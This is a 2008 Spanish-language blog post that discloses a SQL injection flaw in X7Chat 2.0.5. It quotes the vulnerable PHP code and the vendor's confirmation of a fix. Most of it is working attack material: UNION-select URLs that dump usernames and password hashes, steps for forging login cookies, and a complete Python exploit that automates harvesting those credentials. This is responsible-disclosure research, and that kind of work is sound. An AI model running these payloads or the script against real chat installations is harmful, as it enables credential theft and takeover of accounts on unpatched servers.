jueves, 17 de enero de 2008

bug and exploit in X7Chat v 2.0.5

''ENERO 11-12 DE 2008''

Estuve auditando el software, aprendiendo de como esta escrito el codigo, en verdad que ha mejorado mucho desde las primeras versiones.
Intente lo de siempre, ir por el frente y tratar de loguearme como administrador sin tener la contraseña, algo que parece complicado pero muchas veces no
lo es, pero desafortunadamente no me inspiré...

Pero el segundo día fue diferente, se me ocurrio buscar por otro lado, examinar otras posibilidades y voila!, lo inexperadp (o lo esperado?)
Aqui esta la primicia:

{{{
************************************************************************
************************************************************************

Software: X7 Chat 2.0.5 (x7chat.com)

Author: A nonroot user

Vuln Type: SQL injection

Date:

debian:/var/www/xchat/sources# date -u
sáb ene 12 21:21:23 UTC 2008

X7 Group was informed

************************************************************************
************************************************************************


There are an issue in line 72 of /sources/info_box.php

...

69 $body = "";
70 $mini = $_GET['day'];
71 $maxi = $_GET['day']+86400;
72 $query = $db->DoQuery("SELECT * FROM {$prefix}events WHERE timestamp>$mini AND timestamp<$maxi");
73 while($row = $db->Do_Fetch_Row($query)){
74 $body .= "".date($x7c->settings['date_format_full'],$row[1]).": $row[2]

";

75 }
76

...

if the "day" variable is replaced by a SQL injection query, a possible attacker could view the password hash of the mysql table.
Examples:

Got the users: http://vulnhost/xchat_soft/index.php?act=sm_window&page=event&day=1%20UNION%20select%20username,id,username%20from%20x7chat2_us$
Got the hashs: http://vulnhost/xchat_soft/index.php?act=sm_window&page=event&day=1%20UNION%20select%20username,id,password%20from%20x7chat2_u$

Then you can use username and hash passwords in order to login into the X7CHAT, just create 2 cookies:

X7C2U=username
X7C2P=passowrd hash

Who wants to be?


Greetings:

to * AT colombia


************************************************************************
************************************************************************
}}}

Le falta una parte porque mi pantalla no da para mas caracteres, pero el anuncio se publicara cuando alguien lo confirme del equipo X7.

Bueno creo que ya cambio de actividad.

bye.

Respuesta:
{{{
Hello,
Thank you, the vulnerability has been confirmed. A fix is
available here: http://x7chat.com/support_forum/index.php?topic=3287.0
Version 2.0.5.1 has replaced 2.0.5 on the download page, this updated
version contains the fix as well.

Thanks,
Tim
}}}

''' ENERO 14 '''

Como estoy aprendiendo un poco de python, entonces intente codear el exploit en python, aqui esta el resultado, ya lo probe y si funciona.
Mejores maneras de hacerlo (coding) bienvenidas

{{{
nando@debian:~$ cat xchat_exploit.py
#!/usr/bin/python
#
#Exploit for xchat 2.0.5
#Saca los usuarios y los hash
#By nonroot - 2008
#it's a PoC, please use responsibly
#
import string,urllib
import sys,re
print "Target host: i.e: http://127.0.0.1/x7chat/"
host=raw_input("Target host ( include http and /): ")
print "Output file: i.e: salida.txt"
out_file=raw_input("Output file: ")
print "trying ..."
SQL_users="1%20UNION%20select%20username,id,username%20from%20x7chat2_users%20--"
SQL_hashs="1%20UNION%20select%20username,id,password%20from%20x7chat2_users%20--"
link_attack=host+"index.php?act=sm_window&page=event&day="
response = urllib.urlopen(link_attack + SQL_users).read()
findall_users=re.compile("(\w+)

").findall

found_users=findall_users(response)
if len(found_users)==0:print "Sorry, exploit failed, please review the SQL string and try to change something like tables or wathever"
print "Or, there are not users, or x7chat software is version >= 2.0.5.1, so sorry. try to find a new bug ;)"
sys.exit()
#Find the hashs
response = urllib.urlopen(link_attack + SQL_hashs).read()
findall_hashs=re.compile("(\w+)

").findall

found_hashs=findall_hashs(response)
if len(found_hashs)==0:
print "Sorry, exploit failed, please review the SQL string and try to change something like tables or wathever"
print "Or, there are not hashs, or x7chat software is version >= 2.0.5.1, so sorry. try to find a new bug ;)"
sys.exit()
#Save all this at file
file = open(out_file, "w")
file.write("*********************************************************************\n")
file.write("\n")
file.write("HOST:")
file.write(" ")
file.write(host)
file.write("\n")
file.write("\n")
file.write("USER HASH\n")
file.write("possible admin user: ")
file.write(found_users[0])
file.write(" ")
file.write(found_hashs[0])
file.write("\n")
for i in range(len(found_users)):
file.write(found_users[i])
file.write(" ")
file.write(found_hashs[i])
file.write("\n")
file.write("\n")
file.write("*********************************************************************\n")
file.close()
print "Successfull, please review the ",out_file," file."
}}}

get the code at: http://www.milw0rm.com/exploits/4907
------------------------------------
------------------------------------

Entradas populares